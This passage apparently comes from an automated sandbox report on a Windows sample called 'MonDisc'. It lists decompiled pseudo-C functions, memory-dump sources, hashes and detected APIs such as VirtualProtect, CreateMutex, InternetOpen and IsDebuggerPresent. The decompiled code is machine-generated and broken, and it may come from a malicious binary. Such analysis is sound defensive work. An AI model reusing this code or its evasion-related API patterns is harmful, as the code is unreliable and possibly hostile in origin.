                              				void* _t96;
                              				signed long long _t100;
                              				signed long long _t104;
                              
                              				_a8 = __rbx;
                              				_a16 = __rdi;
                              				_a24 = __r14;
                              				_t41 = __ecx;
                              				_t64 = __rdx - 3;
                              				if (_t64 - 1 <= 0) goto 0x2c984c96;
                              				_t43 = __ecx - 0x16;
                              				if (_t43 > 0) goto 0x2c984bdb;
                              				asm("bt eax, ecx");
                              				if (_t43 >= 0) goto 0x2c984bdb;
                              				r15d = 0;
                              				0x2c9c5b38();
                              				if (__ecx == 2) goto 0x2c984b48;
                              				if (__ecx != 0x15) goto 0x2c984b82;
                              				if ( *0x2ca377e8 != 0) goto 0x2c984b82;
                              				_t20 = SetConsoleCtrlHandler(??, ??); // executed
                              				if (_t20 == 0) goto 0x2c984b70;
                              				 *0x2ca377e8 = 1;
                              				goto 0x2c984b82;
                              				0x2c984d64();
                              				 *_t64 =  *0x2c9ee040();
                              				E00007FF67FF62C984730(__ecx, _t20);
                              				if (_t64 == 0) goto 0x2c984bc1;
                              				_t92 =  *0x2ca361d8; // 0xd614c512c627
                              				_t104 = _t92 ^  *_t64;
                              				asm("dec ecx");
                              				_v24 = _t104;
                              				if (__rdx == 2) goto 0x2c984bc1;
                              				asm("dec ecx");
                              				_t100 = __rdx ^ _t92;
                              				 *_t64 = _t100;
                              				E00007FF67FF62C9C5B8C();
                              				if (1 != 0) goto 0x2c984c96;
                              				_t65 = _t104;
                              				goto 0x2c984cb4;
                              				_t51 = __ecx - 0xb;
                              				if (_t51 > 0) goto 0x2c984c96;
                              				asm("bt eax, edi");
                              				if (_t51 >= 0) goto 0x2c984c96;
                              				E00007FF67FF62C9C5560(_t65, _t64, __rdx, _t88);
                              				_t73 = _t65;
                              				if (_t65 == 0) goto 0x2c984c96;
                              				_t76 =  *_t65;
                              				_t66 = _t76;
                              				if (_t76 != 0x2ca16e00) goto 0x2c984c41;
                              				_t77 =  *0x2ca16ec8; // 0xc0
                              				E00007FF67FF62C9C5A90(_t66, _t77);
                              				 *_t73 = _t66;
                              				if (_t66 == 0) goto 0x2c984c96;
                              				E00007FF67FF62C975500();
                              				_t79 =  *_t73;
                              				_t67 = _t79;
                              				_t94 =  *0x2ca16ec0; // 0xc
                              				_t95 = _t94 + _t94;
                              				goto 0x2c984c5a;
                              				if ( *((intOrPtr*)(_t67 + 4)) == _t41) goto 0x2c984c61;
                              				_t68 = _t67 + 0x10;
                              				if (_t68 != _t67 + _t95 * 8) goto 0x2c984c51;
                              				if (_t68 == 0) goto 0x2c984c96;
                              				_t11 = _t68 + 8; // 0x8
                              				_t84 = _t11;
                              				if (_t100 == 2) goto 0x2c984c91;
                              				_t96 = _t79 + _t95 * 8;
                              				if (_t68 == _t96) goto 0x2c984c91;
                              				if ( *((intOrPtr*)(_t84 - 4)) != _t41) goto 0x2c984c91;
                              				 *_t84 = _t100;
                              				_t15 =  &(_t84[2]) - 8; // -16
                              				if (_t15 != _t96) goto 0x2c984c7c;
                              				_t69 =  *_t84;
                              				goto 0x2c984cb4;
                              				_t62 = _t41 - 0x11;
                              				if (_t62 > 0) goto 0x2c984ca5;
                              				asm("bt eax, edi");
                              				if (_t62 < 0) goto 0x2c984cb0;
                              				_t28 = E00007FF67FF62C984D84(_t69);
                              				 *_t69 = 0x16;
                              				return _t28;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ConsoleCtrlHandler
                              • String ID:
                              • API String ID: 1513847179-0
                              • Opcode ID: ff3171f18da4137d9c57eb161dbc096080b1290873d4b961447e7f1aa6f8c6c7
                              • Instruction ID: 60c2f081685211e1f1a4783eab2d387979f389ba49f7d24bae0cd4ce4978e3b4
                              • Opcode Fuzzy Hash: ff3171f18da4137d9c57eb161dbc096080b1290873d4b961447e7f1aa6f8c6c7
                              • Instruction Fuzzy Hash: E1419E62F08A4282FF14CB15DC606B92B99AF96BF0F458A36D94DC77D7DE7CE4448202
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000000F.00000002.466285816.0000025E7E2F0000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000025E7E2F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_25e7e2f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ffc95fc358466f7e87ee8928ce5defe830781478deb736284900a12d07eec796
                              • Instruction ID: bfe6ef89b3c9b010fb7d1658f2a84f2931fed56f02bf7425acd79c2b715da251
                              • Opcode Fuzzy Hash: ffc95fc358466f7e87ee8928ce5defe830781478deb736284900a12d07eec796
                              • Instruction Fuzzy Hash: BD31C52246CD87BAFE2DB6349C0D379F69CEBAD702F67085484C78F091D1384E49558E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466285816.0000025E7E2F0000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000025E7E2F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_25e7e2f0000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: c5d6d032f35a6ed2b8544d8ac8ea4a382a2f8e815242c09f89e5186f177afd47
                              • Instruction ID: 9dacdb9c57a419ebab1e79c0a7eb808bd031bb2e2891460614ae1dbe16544151
                              • Opcode Fuzzy Hash: c5d6d032f35a6ed2b8544d8ac8ea4a382a2f8e815242c09f89e5186f177afd47
                              • Instruction Fuzzy Hash: 0D21CD3246DC98A8FE2C72302C4E338EA1CDB5E717F6680E188C74D0C190344FC6568E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466285816.0000025E7E2F0000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000025E7E2F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_25e7e2f0000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: 600a42b5ae6fc77c6bc28b4d1a9fe0be12661087918726e86373f52275f204c4
                              • Instruction ID: 4423c47c3ca1e3e367d0d2c18a0d532e7b2b4ccbb53dd1d8f7ae6e344bd16bc2
                              • Opcode Fuzzy Hash: 600a42b5ae6fc77c6bc28b4d1a9fe0be12661087918726e86373f52275f204c4
                              • Instruction Fuzzy Hash: AE11DF2259CD86B9FD2931302C1E3BCE66DDF5AB03FA6149185CA8E0C1D1394F8B559E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 22%
                              			E00007FF67FF62C93B430(long long __rbx, long long __rcx, void* __rdx, void* _a8, long long _a16) {
                              				void* _v16;
                              				long long _v32;
                              				void* __rdi;
                              				int _t23;
                              				long long* _t38;
                              				long long _t40;
                              				long long _t49;
                              				long long _t52;
                              				signed long long _t57;
                              				void* _t59;
                              				long long _t60;
                              				void* _t61;
                              				void* _t62;
                              
                              				_a16 = __rbx;
                              				_t40 = __rcx;
                              				_t59 = __rdx;
                              				if ( *((intOrPtr*)(__rcx + 0xbe8)) == 0) goto 0x2c93b484;
                              				if ( *((intOrPtr*)(__rcx + 0xbe4)) == 0x20) goto 0x2c93b484;
                              				r8d = 0x20;
                              				if (VirtualProtect(??, ??, ??, ??) != 0) goto 0x2c93b47a;
                              				E00007FF67FF62C93B9D0(__rcx, __rcx, __rdx, _t61);
                              				asm("int3");
                              				 *((intOrPtr*)(_t40 + 0xbe4)) = 0x20;
                              				_t57 =  *(_t40 + 0x698) << 0xa;
                              				if (__rdx - ( *((intOrPtr*)(_t40 + 0x694)) + 0x00000003 << 0x0000000a & 0xfffff000) <= 0) goto 0x2c93b4b8;
                              				_t49 = _t40;
                              				E00007FF67FF62C90FE90(_t40, _t49, _t57, _t61, _t62);
                              				asm("int3");
                              				if (_t49 +  *((intOrPtr*)(_t40 + 0xc08)) - _t57 <= 0) goto 0x2c93b4d2;
                              				E00007FF67FF62C90FE90(_t40, _t40, _t57, _t61, _t62);
                              				asm("int3"); // executed
                              				E00007FF67FF62C93B7F0(_t38, _t40, _t40, _t61); // executed
                              				_t52 = _t40; // executed
                              				E00007FF67FF62C90FE90(_t40, _t52, _t57, _t61, _t62); // executed
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				asm("int3");
                              				_v32 = _t40;
                              				_t60 = _t52;
                              				if (r8d == 0) goto 0x2c93b57e;
                              				if ( *((intOrPtr*)(_t52 + 0xbe8)) != _t57) goto 0x2c93b551;
                              				if ( *((intOrPtr*)(_t60 + 0xbe4)) == 0x20) goto 0x2c93b571;
                              				r8d = 0x20; // executed
                              				_t23 = VirtualProtect(_t59, ??, ??); // executed
                              				if (_t23 == 0) goto 0x2c93b600;
                              				 *((intOrPtr*)(_t60 + 0xbe4)) = 0x20;
                              				return 0;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 57f19f73c82ce0a22146285461563a87d77a3de998c2158c29345d21f6e43a7f
                              • Instruction ID: 133bed27b4ba3e1fc9accb78638127106acb27e6882c5eb9a2e74b8546a17062
                              • Opcode Fuzzy Hash: 57f19f73c82ce0a22146285461563a87d77a3de998c2158c29345d21f6e43a7f
                              • Instruction Fuzzy Hash: 1C016121F0958686EF58EB21E8583FD2252DF40BA8F184531DA2E87ACBCF7DD5018215
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                              			E00007FF67FF62C9C5ECC(void* __eax, signed int __rcx, signed int __rdx) {
                              				intOrPtr* _t22;
                              				signed int _t29;
                              
                              				_t29 = __rdx;
                              				if (__rcx == 0) goto 0x2c9c5eeb;
                              				_t1 = _t29 - 0x20; // -32
                              				_t22 = _t1;
                              				if (_t22 - __rdx < 0) goto 0x2c9c5f2e;
                              				_t25 =  ==  ? _t22 : __rcx * __rdx;
                              				goto 0x2c9c5f12;
                              				if (E00007FF67FF62C9C3C14() == 0) goto 0x2c9c5f2e;
                              				if (E00007FF67FF62C9E25C0(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x2c9c5f2e;
                              				RtlAllocateHeap(??, ??, ??); // executed
                              				if (_t22 == 0) goto 0x2c9c5efd;
                              				goto 0x2c9c5f3b;
                              				E00007FF67FF62C984D84(_t22);
                              				 *_t22 = 0xc;
                              				return 0;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 173dd6f5690576ccd6bf84726eae5db3837aa6fa1268327332b4b041854edff0
                              • Instruction ID: 114291eef664bf58182e2d4a33ced919b9a71479c86af2593be20bafe766e1df
                              • Opcode Fuzzy Hash: 173dd6f5690576ccd6bf84726eae5db3837aa6fa1268327332b4b041854edff0
                              • Instruction Fuzzy Hash: 0DF09054F0920341FE695B629D113B552941F5CBB0F5C5431CD0EC67C3ED2CE690E223
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                              			E00007FF67FF62C93B610(long long __rbx, long long __rcx, long long* __rdx, void* _a8, long long _a16) {
                              				int _t11;
                              				long long* _t15;
                              				long long* _t26;
                              				void* _t27;
                              
                              				_a16 = __rbx;
                              				_t26 = __rdx;
                              				if ( *((intOrPtr*)(__rcx + 0xbe8)) != 0) goto 0x2c93b636;
                              				E00007FF67FF62C93B7F0(_t15, __rcx, __rcx, _t27); // executed
                              				goto 0x2c93b665;
                              				if ( *((intOrPtr*)(__rcx + 0xbe4)) == 4) goto 0x2c93b665;
                              				r8d = 4; // executed
                              				_t11 = VirtualProtect(??, ??, ??, ??); // executed
                              				if (_t11 == 0) goto 0x2c93b681;
                              				 *((intOrPtr*)(__rcx + 0xbe4)) = 4;
                              				 *_t26 =  *((intOrPtr*)(__rcx + 0xbf8));
                              				return _t11;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Virtual$Protect$AllocFree
                              • String ID:
                              • API String ID: 3729553426-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 51%
                              			E00007FF67FF62C8F5074(void* __eflags, void* __rax, void* __rbx, signed int __rcx) {
                              				void* _v16;
                              				void* _t18;
                              				long long _t25;
                              				void* _t32;
                              
                              				if (__eflags < 0) goto 0x2c8f509a;
                              				_t25 =  *((intOrPtr*)(__rcx + 0x70 + __rcx * 8));
                              				 *((long long*)(_t32 - __rax + 0x20 + __rcx * 8)) = _t25;
                              				if (__eflags >= 0) goto 0x2c8f508b;
                              				if (( *(__rcx + 0xf) & 0x000000ff) == 0) goto 0x2c8f50c2;
                              				asm("movaps xmm0, [ebx+0x10]");
                              				asm("movaps xmm1, [ebx+0x20]");
                              				asm("movaps xmm2, [ebx+0x30]");
                              				asm("movaps xmm3, [ebx+0x40]"); // executed
                              				_t18 =  *__rcx(); // executed
                              				 *((long long*)(__rcx + 0x50)) = _t25;
                              				asm("movaps [ebx+0x10], xmm0");
                              				return _t18;
                              			}

                              APIs
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00007FF67FF62C8FF9D0() {
                              				long _t43;
                              				intOrPtr _t61;
                              				intOrPtr* _t73;
                              				long long _t75;
                              				long long _t76;
                              				long long _t78;
                              				signed long long _t80;
                              				void* _t84;
                              				long long _t94;
                              				void* _t96;
                              				signed long long _t100;
                              				intOrPtr _t108;
                              				void* _t112;
                              				void* _t114;
                              				void* _t115;
                              				signed long long _t117;
                              				signed int _t121;
                              				long long _t127;
                              
                              				 *((long long*)(_t114 + 0x18)) = _t75;
                              				_t115 = _t114 - 0x20;
                              				_t127 = _t94;
                              				_t76 = _t78;
                              				E00007FF67FF62C984D84(_t73);
                              				_t61 =  *_t73;
                              				 *((intOrPtr*)(_t115 + 0x60)) = _t61;
                              				_t43 = GetLastError();
                              				_t117 =  *((intOrPtr*)(_t76 + 0x20));
                              				r15d = _t43;
                              				_t108 =  *((intOrPtr*)(_t76 + 0x10));
                              				_t80 =  *(_t76 + 0x50) & 0xfffffffc;
                              				 *(_t115 + 0x68) = _t43;
                              				r8d =  *(_t80 + 0x20);
                              				 *((long long*)(_t80 + 0x60)) = _t127;
                              				_t112 =  *((intOrPtr*)(( *(_t117 - 0x10) & 0xffffffff) + 0x20)) - 0x68;
                              				r8d = E00007FF67FF62C8FEF60(0xffffffff, _t112, _t127);
                              				_t121 = _t117 * 8;
                              				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
                              				_t84 = _t108 + 0x2d8;
                              				if ( *((intOrPtr*)(_t84 + 0xec)) == 0) goto 0x2c8ffa78;
                              				_t96 = _t127 - 4;
                              				 *((long long*)(_t84 + 0x80)) = _t76;
                              				E00007FF67FF62C910750(_t84, _t96); // executed
                              				if (( *(_t108 + 0x91) & 0x00000008) == 0) goto 0x2c8ffab2;
                              				if ( *((intOrPtr*)(_t108 + 0x148)) != 0) goto 0x2c8ffab2;
                              				 *((intOrPtr*)(_t108 + 0x148)) =  *((intOrPtr*)(_t108 + 0x14c));
                              				_t25 = _t96 - 4; // -1
                              				r8d = _t25;
                              				E00007FF67FF62C8FEEA0( *((intOrPtr*)(_t108 + 0x14c)), 3, _t76);
                              				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
                              				if (( *(_t108 + 0x91) & 0x00000004) == 0) goto 0x2c8ffb23;
                              				_t100 = _t127 - _t112 - 0x68 >> 2;
                              				r15d = E00007FF67FF62C917CA0(2, _t112);
                              				if (_t127 -  *((intOrPtr*)(_t80 + 0x60)) <= 0) goto 0x2c8ffaff;
                              				if (_t61 - 1 -  *((intOrPtr*)(_t112 + 0xc)) >= 0) goto 0x2c8ffaff;
                              				if (r15d == E00007FF67FF62C917CA0(_t61 - 1, _t112)) goto 0x2c8ffb1a;
                              				r8d = r15d;
                              				E00007FF67FF62C8FEEA0(_t49, 2, _t76);
                              				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
                              				r15d =  *(_t115 + 0x68);
                              				if (( *(_t108 + 0x91) & 0x00000002) == 0) goto 0x2c8ffb4a;
                              				if (( *(_t127 - 4) & 0x000000ff) - 0x49 - 3 > 0) goto 0x2c8ffb4a;
                              				_t40 = _t100 - 2; // -1
                              				r8d = _t40;
                              				E00007FF67FF62C8FEEA0(( *(_t127 - 4) & 0x000000ff) - 0x49, 1, _t76);
                              				E00007FF67FF62C984D84(0xffffffff);
                              				 *0xffffffff =  *((intOrPtr*)(_t115 + 0x60));
                              				goto ( *0x2c9ee048);
                              			}

                              APIs
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: ExtraIconicInfoLengthMessageParentTextWindow
                              • String ID:
                              • API String ID: 2293158828-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 65%
                              			E00007FF67FF62C9C5754(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                              				void* _t36;
                              				void* _t37;
                              				void* _t38;
                              				int _t43;
                              				signed long long _t65;
                              				long long _t68;
                              				_Unknown_base(*)()* _t88;
                              				void* _t92;
                              				void* _t93;
                              				void* _t95;
                              				signed long long _t96;
                              				struct _EXCEPTION_POINTERS* _t102;
                              
                              				 *((long long*)(_t95 + 0x10)) = __rbx;
                              				 *((long long*)(_t95 + 0x18)) = __rsi;
                              				_t93 = _t95 - 0x4f0;
                              				_t96 = _t95 - 0x5f0;
                              				_t65 =  *0x2ca361d8; // 0xd614c512c627
                              				 *(_t93 + 0x4e0) = _t65 ^ _t96;
                              				if (__ecx == 0xffffffff) goto 0x2c9c5793;
                              				_t37 = E00007FF67FF62C974564(_t36);
                              				r8d = 0x98;
                              				_t38 = E00007FF67FF62C974DE0(_t37, 0, _t96 + 0x70, __rdx, __r8);
                              				r8d = 0x4d0;
                              				E00007FF67FF62C974DE0(_t38, 0, _t93 + 0x10, __rdx, __r8);
                              				 *((long long*)(_t96 + 0x48)) = _t96 + 0x70;
                              				_t68 = _t93 + 0x10;
                              				 *((long long*)(_t96 + 0x50)) = _t68;
                              				 *0x2c9ee050();
                              				r8d = 0;
                              				 *0x2c9ee058();
                              				if (_t68 == 0) goto 0x2c9c5826;
                              				 *(_t96 + 0x38) =  *(_t96 + 0x38) & 0x00000000;
                              				 *((long long*)(_t96 + 0x30)) = _t96 + 0x58;
                              				 *((long long*)(_t96 + 0x28)) = _t96 + 0x60;
                              				 *((long long*)(_t96 + 0x20)) = _t93 + 0x10;
                              				 *0x2c9ee070();
                              				 *((long long*)(_t93 + 0x108)) =  *((intOrPtr*)(_t93 + 0x508));
                              				 *((intOrPtr*)(_t96 + 0x70)) = __edx;
                              				 *((long long*)(_t93 + 0xa8)) = _t93 + 0x510;
                              				 *((long long*)(_t93 - 0x80)) =  *((intOrPtr*)(_t93 + 0x508));
                              				 *((intOrPtr*)(_t96 + 0x74)) = r8d;
                              				_t43 = IsDebuggerPresent();
                              				SetUnhandledExceptionFilter(_t88, _t92);
                              				if (UnhandledExceptionFilter(_t102) != 0) goto 0x2c9c5888;
                              				if (_t43 != 0) goto 0x2c9c5888;
                              				if (__ecx == 0xffffffff) goto 0x2c9c5888;
                              				return E00007FF67FF62C973DE0(E00007FF67FF62C974564(_t45), __ecx,  *(_t93 + 0x4e0) ^ _t96);
                              			}

                              APIs
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Similarity
                              • API ID: AddressCriticalProcSection$CreateDeleteInitializeLibraryLoadObjectSingleThreadWait
                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                              • API String ID: 3275198946-184456188
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Similarity
                              • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                              • API String ID: 4260375681-184456188
                              • Opcode ID: b633c80ecc07e22be945b0d230a5f9c6b3a5a3e41201ca62d3f1db35ac4fbc3e
                              • Instruction ID: a52ea1e514fdf5798c5246d31c1803ddc23d7c4b2a8195aab2c7cd51a7936b3d
                              • Opcode Fuzzy Hash: b633c80ecc07e22be945b0d230a5f9c6b3a5a3e41201ca62d3f1db35ac4fbc3e
                              • Instruction Fuzzy Hash: 7D111322E0AB4682EF14CF28A84436933E5FB48B69F544439C94EC6269EF7DE588C301
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: "$cosh
                              • API String ID: 1156100317-3800341493
                              • Opcode ID: b43cb023599677540fbdb09b7340c2f8add757efa231faf9ea5364d50d06fef6
                              • Instruction ID: e8188a516cd026b0092ab483db3e5b79355a33a4c1e902b428427e417a704a14
                              • Opcode Fuzzy Hash: b43cb023599677540fbdb09b7340c2f8add757efa231faf9ea5364d50d06fef6
                              • Instruction Fuzzy Hash: 88818E21D28F8588DA63CB34B8513767358AF673E5F519333E58E71A62DF6CA1834701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 23%
                              			E00007FF67FF62C9D1614(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, char _a8, long long _a16, unsigned int _a32, unsigned int _a36, signed short _a38) {
                              				void* _t31;
                              				signed short _t32;
                              				unsigned int _t35;
                              				unsigned int _t36;
                              				signed int _t41;
                              				signed int _t42;
                              				signed int _t43;
                              				signed int _t44;
                              				signed int _t45;
                              				void* _t53;
                              				unsigned int _t54;
                              				signed int _t68;
                              				signed int _t69;
                              				void* _t72;
                              				signed int _t73;
                              				void* _t74;
                              				signed int _t78;
                              				signed int _t81;
                              				signed long long _t85;
                              				void* _t102;
                              				void* _t103;
                              
                              				_a16 = __rbx;
                              				r14d = 0;
                              				asm("movaps [esp+0x20], xmm6");
                              				_t41 = __ecx & 0x0000001f;
                              				r15d = __ecx;
                              				_t2 = _t103 + 0x10; // 0x10
                              				r13d = _t2;
                              				if ((__ecx & 0x00000008) == 0) goto 0x2c9d165d;
                              				if (r12b >= 0) goto 0x2c9d165d;
                              				E00007FF67FF62C9D0F1C(_t41, __rcx);
                              				_t42 = _t41 & 0xfffffff7;
                              				goto 0x2c9d183f;
                              				_t68 = 0x00000004 & r15b;
                              				if (_t68 == 0) goto 0x2c9d167b;
                              				asm("dec ecx");
                              				if (_t68 >= 0) goto 0x2c9d167b;
                              				E00007FF67FF62C9D0F1C(_t42, __rcx);
                              				_t43 = _t42 & 0xfffffffb;
                              				goto 0x2c9d183f;
                              				_t69 = sil & r15b;
                              				if (_t69 == 0) goto 0x2c9d173e;
                              				asm("dec ecx");
                              				if (_t69 >= 0) goto 0x2c9d173e;
                              				_t31 = E00007FF67FF62C9D0F1C(_t43, __rcx);
                              				_t85 = __r8 & __rcx;
                              				if (_t69 == 0) goto 0x2c9d1709;
                              				if (_t85 == 0x2000) goto 0x2c9d16f0;
                              				if (_t85 == 0x4000) goto 0x2c9d16d7;
                              				_t72 = _t85 - __rcx;
                              				if (_t72 != 0) goto 0x2c9d1736;
                              				asm("movsd xmm0, [ebp]");
                              				asm("comisd xmm0, [0x43b95]");
                              				asm("movsd xmm0, [0x4b2d5]");
                              				if (_t72 > 0) goto 0x2c9d1731;
                              				goto 0x2c9d172a;
                              				asm("movsd xmm0, [ebp]");
                              				asm("comisd xmm0, [0x43b7c]");
                              				if (_t72 > 0) goto 0x2c9d1718;
                              				asm("movsd xmm0, [0x4b2ba]");
                              				goto 0x2c9d172a;
                              				asm("movsd xmm0, [ebp]");
                              				asm("comisd xmm0, [0x43b63]");
                              				if (_t72 <= 0) goto 0x2c9d1722;
                              				asm("movsd xmm0, [0x4b2a1]");
                              				goto 0x2c9d1731;
                              				asm("movsd xmm0, [ebp]");
                              				asm("comisd xmm0, [0x43b4a]");
                              				if (_t72 <= 0) goto 0x2c9d1722;
                              				asm("movsd xmm0, [0x4b278]");
                              				goto 0x2c9d1731;
                              				asm("movsd xmm0, [0x4b26e]");
                              				asm("xorps xmm0, [0x39f9f]");
                              				asm("movsd [ebp], xmm0");
                              				_t44 = _t43 & 0xfffffffe;
                              				goto 0x2c9d183f;
                              				_t73 = r15b & 0x00000002;
                              				if (_t73 == 0) goto 0x2c9d183f;
                              				asm("dec ecx");
                              				if (_t73 >= 0) goto 0x2c9d183f;
                              				asm("movsd xmm0, [edx]");
                              				asm("xorps xmm6, xmm6");
                              				asm("ucomisd xmm0, xmm6");
                              				if (_t73 != 0) goto 0x2c9d1771;
                              				if (_t73 != 0) goto 0x2c9d1771;
                              				goto 0x2c9d1830;
                              				_t32 = E00007FF67FF62C9D1D3C(_t31, _t73,  &_a8);
                              				_t53 = _a8 + 0xfffffa00;
                              				asm("movsd [esp+0x88], xmm0");
                              				_t74 = _t53 - 0xfffffbce;
                              				if (_t74 >= 0) goto 0x2c9d17a1;
                              				asm("mulsd xmm0, xmm6");
                              				goto 0x2c9d182b;
                              				r8d = r14d;
                              				asm("comisd xmm6, xmm0");
                              				r8b = _t74 > 0;
                              				_a38 = _t32 & 0x0000000f | r13w;
                              				if (_t53 - 0xfffffc03 >= 0) goto 0x2c9d1816;
                              				_t35 = _a32;
                              				_t54 = _a36;
                              				if ((sil & _t35) == 0) goto 0x2c9d17ef;
                              				_t64 =  ==  ? 1 : 1;
                              				_t36 = _t35 >> 1;
                              				_a32 = _t36;
                              				_t78 = sil & _t54;
                              				if (_t78 == 0) goto 0x2c9d1808;
                              				asm("bts eax, 0x1f");
                              				_a32 = _t36;
                              				if (_t78 != 0) goto 0x2c9d17e5;
                              				_a36 = _t54 >> 1;
                              				asm("movsd xmm0, [esp+0x88]");
                              				if (r8d == 0) goto 0x2c9d182b;
                              				asm("xorps xmm0, [0x39ea5]");
                              				asm("movsd [ebp], xmm0");
                              				_t80 =  ==  ? 1 : 1;
                              				if (( ==  ? 1 : 1) == 0) goto 0x2c9d183c;
                              				E00007FF67FF62C9D0F1C(_t44, _t102);
                              				_t45 = _t44 & 0xfffffffd;
                              				_t81 = r13b & r15b;
                              				if (_t81 == 0) goto 0x2c9d1858;
                              				asm("dec ecx");
                              				if (_t81 >= 0) goto 0x2c9d1858;
                              				E00007FF67FF62C9D0F1C(_t45, _t102);
                              				asm("movaps xmm6, [esp+0x20]");
                              				r14b = (_t45 & 0xffffffef) == 0;
                              				return r14d;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
